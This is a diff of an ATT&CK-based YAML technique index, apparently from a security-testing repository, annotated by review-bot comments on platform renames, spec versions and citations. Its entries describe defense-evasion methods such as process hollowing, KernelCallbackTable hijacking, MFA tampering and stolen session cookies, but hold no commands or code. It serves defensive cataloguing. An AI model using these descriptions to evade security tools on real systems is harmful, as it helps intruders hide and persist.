T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: AWS - GuardDuty Suspension or Deletion
@@ -9365,7 +9457,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9400,8 +9492,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9467,7 +9557,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9493,7 +9582,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9518,11 +9607,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9539,7 +9627,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9549,7 +9636,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9558,19 +9645,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
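Review bot: the platform rename here (`Azure AD`, `Office 365` and `Google Workspace` dropped; `Office Suite` and `Identity Provider` added, with `x_mitre_version` 2.6 to 2.7) will break anything that selects techniques by the old platform strings, because T1078 simply stops matching rather than failing loudly; grep the repository for the three old names and update any per-platform index generation or filters in this same PR, and do the same for T1556.006 further down, which receives the identical change. `x_mitre_modified_by_ref` removed in this hunk is re-added in the next one, so that part is a move, not a deletion.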
@@ -9618,11 +9703,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9690,18 +9776,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
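Review bot: after this hunk T1055.012 sits at `x_mitre_attack_spec_version: 3.2.0` while its neighbours in the same file (T1134.004, T1564.009, T1027.005) stay at 2.1.0 and others (T1574.010, T1070.005, T1556.008) are at 3.1.0, so the index now mixes three ATT&CK spec versions; that mirrors upstream, where objects are only restamped when edited, but any consumer that validates the whole file against a single spec version needs to tolerate it. The Leitch Hollowing reference is swapped from the autosectools.com PDF to a copy hosted at new.dc414.org with a September 12, 2024 retrieval date; the citation text shows it is the same paper, but since the new host is a third-party mirror the PR should say so, so nobody later reads the URL change as a change of source.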
@@ -9748,7 +9833,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9770,7 +9855,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9845,6 +9929,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9904,12 +9989,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9938,24 +10022,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
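Review bot: The platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (version `1.2` to `1.3`), and the same consolidation is applied to T1550.004, T1656 and T1562.008 below; any per-platform index that selects techniques by the old platform names will silently stop including these techniques, so confirm the index generator maps the new names. Separately, the `+ x_mitre_attack_spec_version: 3.2.0` and `+ x_mitre_modified_by_ref` lines here are moves, not additions: the old copies near the end of the object are removed in the following hunk.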
@@ -9990,9 +10076,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -10015,7 +10098,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -10033,8 +10116,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
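Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed from T1036.001 together with `spec_version`, whereas T1564.009 above keeps its `x_mitre_attack_spec_version: 2.1.0` as unchanged context; unless the key is re-added in sorted position earlier in this object (outside the hunk), this technique ends up without a spec version, which is inconsistent with the rest of the file.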
@@ -10073,7 +10154,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10116,10 +10197,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
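Review bot: The new T1027.014 (Polymorphic Code) entry has no `identifier:` key, while the T1564.006 entry immediately above it carries `identifier: T1564.006` and T1134.005 below carries `identifier: T1134.005`; since other entries (T1564.009, T1556.006) also lack it, the field is already inconsistent, but if any consumer keys on `identifier` the new entry should include `identifier: T1027.014`. The entry ships with `atomic_tests: []` and `x_mitre_detection: ''`, so it is a placeholder technique with no test coverage and no detection guidance; worth mentioning in the PR description.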
@@ -10163,7 +10312,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10188,8 +10337,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10220,7 +10367,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10239,7 +10386,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10334,11 +10480,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10418,11 +10563,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10487,12 +10631,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10541,8 +10684,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -10557,14 +10700,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10576,7 +10718,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10606,13 +10748,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -10673,7 +10814,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1027.003:
@@ -10729,11 +10869,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -10757,11 +10896,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -10786,9 +10924,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -10868,7 +11005,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -10902,7 +11038,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
